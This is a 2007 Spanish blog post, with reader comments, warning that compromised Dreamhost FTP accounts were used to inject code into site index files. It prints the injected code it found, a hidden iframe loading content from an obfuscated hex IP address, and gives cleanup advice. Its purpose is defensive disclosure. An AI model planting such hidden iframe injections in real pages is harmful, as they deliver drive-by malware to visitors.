Varias cuentas de Dreamhost fueron hackeadas

@ 07 . junio . 2007

peligro

Ayer me llegó un e-mail de Dreamhost diciendo:

Un tercero obtuvo el camino de poder tener las contraseñas asociadas con 3500 cuentas de FTP y ha usado esa información para adjuntar un código al index de cada sitio usando scripts automáticos, primordialmente para optimización SEO (optimización de un sitio para una búsqueda).

Nuestros reportes indican que solo un 20% de las cuentas cuyos passwords fueron accedidos han sufrido este cambio. esto representa un 0.15% de todas las cuentas de Dreamhost. La mayoría de las cuentas estan intactas.

Yo pensé que no me afectaría, 3500 cuentas es menos de los que usan Dreamhost en todo Texas. Pero si así fuera, muy poco probable según ese e-mail, era algo SEO, para cuestiones de optimización de búsqueda, lo que me dió a entender que si yo sufría el ataque vería un enlace extra en mis sitios para dar Page Rank al que hizo el script lo cual resultó ser: FALSO

:furia: Hace 10 minutos un amigo mío me indica que por visitar mi sitio: Vectorice usando Internet Explorer 6, se le desconfiguró la conexión a internet y luego tuvo pantalla negra en su PC. Su Sistema Operativo Windows se arruinó y tuvo que reinstalar todo desde cero.

:advertencia: El script arruina a Windows si usas Internet Explorer 6 pero con Firefox no pasa nada.

Vectorice.com ya esta solucionado. Encontré el siguiente script en el index:

IFRAME src='http://0xcb.0xdf.0x9e.0x0c/t' width='6' height='6' style='visibility: hidden;'> </IFRAME

Los blogs con WordPress

Los dominios que tengan un blog con WordPress parece que no representarán amenaza alguna, porque encontré ese script en una instalación que tengo en un blog de prueba en vectorice y en el antiguo ctrl-F5. El script estaba luego del tag < /html >, por lo que queda inactivado automáticamente.

Se recomienda que revisen cada uno de sus sitios con un index.html, index.php, etc, y cada sub-URL. Cambien también la contraseña de sus cuentas de FTP y de su panel de Control.

DanielSemperAutor: Daniel Semper, fanático de la tecnología y sus usos sociales, cinéfilo geek, al menos veo una película por semana, innovador en Front-End y activo lector de comics. En mis tiempos libres soy ingeniero y estudio una maestría en Sidney en la universidad de UTS. Me puedes contactar en: twitter, Google Plus.
e-mail: hola @ danielsemper.com

Noticias Similares

  • Nova

    Hola tio, vaya putada!Por cierto sabes donde se cambia la contraseña del FTP de dreamhost, esque con tantas opciones no la encuentro en el panel.
    Gracias!

  • Las cuentas FTP las cambias en el menú lateral:

    Users>Manage Users

    Tu contraseña del Panel de Control la cambias en el enlace de arriba:

    Edit Profile>Security

  • Para WordPress:

    Recuerden que también hay un index.php en la carpeta wp-admin y wp-content, ahí también he encontrado el script con iframe.

    Antivirus
    Mi Antivirus ha detectado un Trojan: Downloader

    Discovered: June 8, 2001
    Updated: February 13, 2007 11:50:11 AM
    Type: Trojan Horse
    Systems Affected: Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows XP

    Downloader does the following:

    • Goes to a specific Web or FTP site that its author created and attempts to download new Trojans, viruses, worms, or their components.
    • After the Trojan downloads the files, it executes them.

    :!:

  • The Ghost

    Vaya una lástima por dreamhost. Esto hace que su servicio decaiga, osea el descuido por las cuentas ftp. Bueno felizmente a mi no me ha tocado, aunque no estuvo de mas dar una chekeadita en los archivos en busca de ese iframe.

    Saludos
    The Ghost